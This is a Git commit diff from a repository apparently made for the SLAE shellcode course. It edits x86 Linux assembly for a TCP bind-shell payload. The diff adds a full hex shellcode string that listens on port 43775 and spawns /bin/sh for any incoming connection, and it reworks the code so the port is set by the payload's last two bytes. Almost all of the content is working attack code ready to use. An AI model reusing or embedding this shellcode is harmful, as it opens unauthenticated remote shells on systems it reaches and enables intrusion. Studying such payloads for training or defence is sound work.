arno/SLAE
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

minor updates

Browse Source
This commit is contained in:
arno01 2013-03-09 11:41:17 +01:00
parent 535c3c197a
commit 6cfe507410
4 changed files with 16 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
exam1/shell_bind_tcp.nasm
View File

@ -135,7 +135,7 @@ port_in_esp:
push edx ; ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) }; push edx ; ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
;push DWORD 0x0100007f ; For 127.0.0.1 HOST ;push DWORD 0x0100007f ; For 127.0.0.1 HOST
;push WORD 0xffaa ; PORT 43775 (reverse), || unsigned short sin_port, ;push WORD 0xffaa ; PORT 43775 (reverse), || unsigned short sin_port,
push WORD [edi] ; PORT is specified in the bottom of the code / shellcode. Last two bytes in HEX. push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
push WORD bx ; 2 - AF_INET || struct sockaddr { short sin_family, push WORD bx ; 2 - AF_INET || struct sockaddr { short sin_family,
mov ecx, esp ; Save PTR to sockaddr struct in ECX mov ecx, esp ; Save PTR to sockaddr struct in ECX

BIN
exam1/shell_bind_tcp_smaller
View File

Binary file not shown.

19
exam1/shell_bind_tcp_smaller.nasm
View File

@ -3,11 +3,13 @@
; 2013 March ; 2013 March
; ;
; DESC: ; DESC:
; Binds to a port 12345 ; Binds to a port 43775
; Execs Shell on incoming connection ; Execs Shell on incoming connection
; ;
; TODO: ;
; 1. Port number should be easily configurable; ; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
;
; Port is the last two bytes of the shellcode. In hex \xaa\xff (0xaaff = 43775)
; ;
; ;
@ -27,12 +29,17 @@ _start:
int 0x80 int 0x80
mov esi, eax ; save socket fd in ESI for later mov esi, eax ; save socket fd in ESI for later
jmp short call_get_port
port_in_esp:
pop edi ; getting port address from ESP
push BYTE 102 push BYTE 102
pop eax ; socketcall pop eax ; socketcall
inc ebx ; 2 = SYS_BIND bind() inc ebx ; 2 = SYS_BIND bind()
xor edx, edx xor edx, edx
push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) }; push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
push WORD 0x3930 ; PORT 12345 (reverse), || unsigned short sin_port, push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family, push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
mov ecx, esp ; Save PTR to sockaddr struct in ECX mov ecx, esp ; Save PTR to sockaddr struct in ECX
push BYTE 16 ; socklen_t addrlen); push BYTE 16 ; socklen_t addrlen);
@ -85,3 +92,7 @@ dup2_loop:
mov al, 11 ; execve mov al, 11 ; execve
int 0x80 int 0x80
call_get_port:
call port_in_esp
db 0xaa, 0xff ; BYTE (43775 in straight hex)

BIN
exam1/shell_bind_tcp_smaller.o
View File

Binary file not shown.